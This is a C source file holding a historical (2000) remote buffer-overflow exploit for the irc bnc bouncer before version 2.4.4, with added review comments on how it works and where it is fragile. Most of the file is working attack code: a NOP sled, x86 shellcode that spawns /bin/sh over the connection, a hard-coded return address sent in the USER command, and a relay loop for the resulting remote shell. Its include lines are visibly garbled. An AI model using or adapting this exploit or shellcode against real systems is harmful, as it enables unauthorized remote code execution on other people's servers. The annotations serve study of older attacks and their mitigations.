/*
 * Exploit for irc bnc < 2.4.4.
 * This is only my third remote exploit, ever, so it might be a bit rough
 * around the edges. For instance the distance from the stack to the ret
 * pointer has to be *exactly* 1031 for this to work
 *
 * Tekneeq - http://www.attrition.org/hosted/tekneeq
 *
 * Review notes (added): historical (2000) stack-smashing proof of concept
 * preserved as found. The comments below only describe what the code as
 * written does and where it is fragile; nothing in the code was changed.
 */

/*
 * NOTE(review): the header names following these #include directives were
 * lost in extraction, so the file as shown does not preprocess.
 */
#include
#include
#include
#include
#include
#include
#include
#include

/* Byte offset within the USER argument at which the saved return address
 * is overwritten; per the header comment it must be exactly this value. */
#define RET_POS 1031
/* Hard-coded value written over the saved return pointer (*ret in main()).
 * NOTE(review): a fixed stack address, i.e. the PoC assumes a predictable
 * and executable stack; stack randomization and non-executable stacks are
 * the mitigations that break this assumption. */
#define RETURN_ADDRESS 0xbffff9e0

/* Payload bytes, stored verbatim from the original. main() copies them into
 * overflow_buf so that the last byte lands at RET_POS-1; the string ends in
 * the literal "/bin/sh". */
char hellcode[]="\x31\xdb\x89\xd8\x89\xd9\xfe\xc1\xb0\x3f\xcd\x80\xfe\xc1"
"\x31\xc0\xb0\x3f\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";

int fdprintf(int dafd,char *fmt,...);
int tcp_connect(struct in_addr addr,unsigned short port);
void RunShell(int thesock);
/* NOTE(review): host_to_ip() is called from main() but is only defined
 * further down and has no prototype here — an implicit declaration, which
 * C99 removed and C23 rejects outright. */

/*
 * Entry point. Expects a host and a port on the command line. Fills a
 * 4096-byte buffer with 0x90 (NOP) bytes, places the payload so it ends at
 * RET_POS, writes RETURN_ADDRESS immediately after it, NUL-terminates the
 * string, sends it as the USER argument and then hands the connection to
 * RunShell().
 *
 * NOTE(review): every error path calls exit(0), i.e. reports success to the
 * invoking shell, and main() falls off the end without a return statement.
 */
int main (int argc,char **argv)
{
    int fd;
    int ctr,a;
    struct in_addr host;
    unsigned short port;
    unsigned char overflow_buf[4096];
    unsigned long *ret;

    if (argc < 3) {
        /* NOTE(review): the argument placeholders after "%s " appear to
         * have been lost in extraction, like the include names above. */
        printf("Usage: %s \n",argv[0]);
        exit(0);
    }
    if (!host_to_ip(argv[1],&host)) {
        fprintf(stderr,"Hostname lookup failure\n");
        exit(0);
    }
    /* atoi() yields 0 for unparsable input, so garbage and an explicit 0
     * are both rejected; values above 65535 wrap silently in the short. */
    if (!(port=atoi(argv[2]))) {
        fprintf(stderr,"Invalid port !\n");
        exit(0);
    }
    memset(overflow_buf,0x90,sizeof(overflow_buf)); /* fill it with NOPs */
    /* Copy the payload so that its final byte sits at RET_POS-1. */
    a=0;
    for (ctr=(RET_POS-strlen(hellcode));ctr<(RET_POS);ctr++)
        overflow_buf[ctr]=hellcode[a++];
    /* Terminate the string four bytes past RET_POS, i.e. directly after the
     * address stored below.
     * NOTE(review): this assumes a 4-byte unsigned long (32-bit target). On
     * an LP64 build *ret stores 8 bytes and clobbers this terminator. The
     * store also goes through a cast pointer at an odd offset (1031), a
     * misaligned access that x86 tolerates but C does not guarantee. */
    overflow_buf[RET_POS+4]=0;
    ret=(unsigned long *)(overflow_buf+RET_POS);
    *ret=RETURN_ADDRESS;
    printf("Connecting\n");
    fd=tcp_connect(host,port);
    printf("Sending overflow\n");
    fdprintf(fd,"USER %s\r\n",overflow_buf);
    sleep(2);
    /* NOTE(review): printed unconditionally — nothing checks whether the
     * remote side did anything before the relay loop starts. */
    printf("Got shell\n");
    RunShell(fd);
}

/*
 * Open a TCP connection to addr:port and return the connected descriptor.
 * A socket() or connect() failure is reported with perror() and terminates
 * the process via exit(0) instead of being returned to the caller.
 */
int tcp_connect(struct in_addr addr,unsigned short port)
{
    int fd;
    struct sockaddr_in serv;

    bzero(&serv,sizeof(serv));
    serv.sin_addr=addr;
    serv.sin_port=htons(port);
    serv.sin_family=AF_INET;
    if ((fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0) {
        perror("socket");
        exit(0);
    }
    if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) {
        perror("connect");
        exit(0);
    }
    return(fd);
}

/*
 * printf()-style helper: formats into a 4096-byte stack buffer and write()s
 * the resulting string to dafd. Output longer than 4095 bytes is truncated
 * by vsnprintf(); the write() result is not checked and the return value is
 * always 1.
 */
int fdprintf(int dafd,char *fmt,...)
{
    char mybuffer[4096];
    va_list va;

    va_start(va,fmt);
    vsnprintf(mybuffer,4096,fmt,va);
    write(dafd,mybuffer,strlen(mybuffer));
    va_end(va);
    return(1);
}

/*
 * Resolve hostname with gethostbyname() and copy the first address into
 * *addr. Returns 1 on success, 0 when the lookup fails.
 *
 * NOTE(review): h_length bytes are copied without checking that
 * h_addrtype is AF_INET or that h_length equals sizeof(struct in_addr).
 * gethostbyname() is also obsolete and not thread-safe; getaddrinfo() is
 * the usual replacement.
 */
int host_to_ip(char *hostname,struct in_addr *addr)
{
    struct hostent *res;

    res=gethostbyname(hostname);
    if (res==NULL)
        return(0);
    memcpy((char *)addr,res->h_addr,res->h_length);
    return(1);
}

/*
 * select()-based relay: whatever becomes readable on the socket is printed
 * to stdout, whatever is typed on stdin is written to the socket, until the
 * socket read returns 0 or an error, which exit(0)s the process.
 *
 * NOTE(review): both read() calls ask for the full 1024 bytes of recvbuf,
 * and the following recvbuf[n]=0 writes one byte past the array when
 * n == 1024 — a stack buffer overflow in this client itself. The select()
 * and write() return values are not checked either.
 */
void RunShell(int thesock)
{
    int n;
    char recvbuf[1024];
    fd_set rset;

    while (1) {
        FD_ZERO(&rset);
        FD_SET(thesock,&rset);
        FD_SET(STDIN_FILENO,&rset);
        select(thesock+1,&rset,NULL,NULL,NULL);
        if (FD_ISSET(thesock,&rset)) {
            n=read(thesock,recvbuf,1024);
            if (n <= 0) {
                printf("Connection closed\n");
                exit(0);
            }
            recvbuf[n]=0; /* out of bounds when n == 1024, see above */
            printf("%s",recvbuf);
        }
        if (FD_ISSET(STDIN_FILENO,&rset)) {
            n=read(STDIN_FILENO,recvbuf,1024);
            if (n>0) {
                recvbuf[n]=0; /* same off-by-one as the socket branch */
                write(thesock,recvbuf,n);
            }
        }
    }
}
/* www.hack.co.za [2000]*/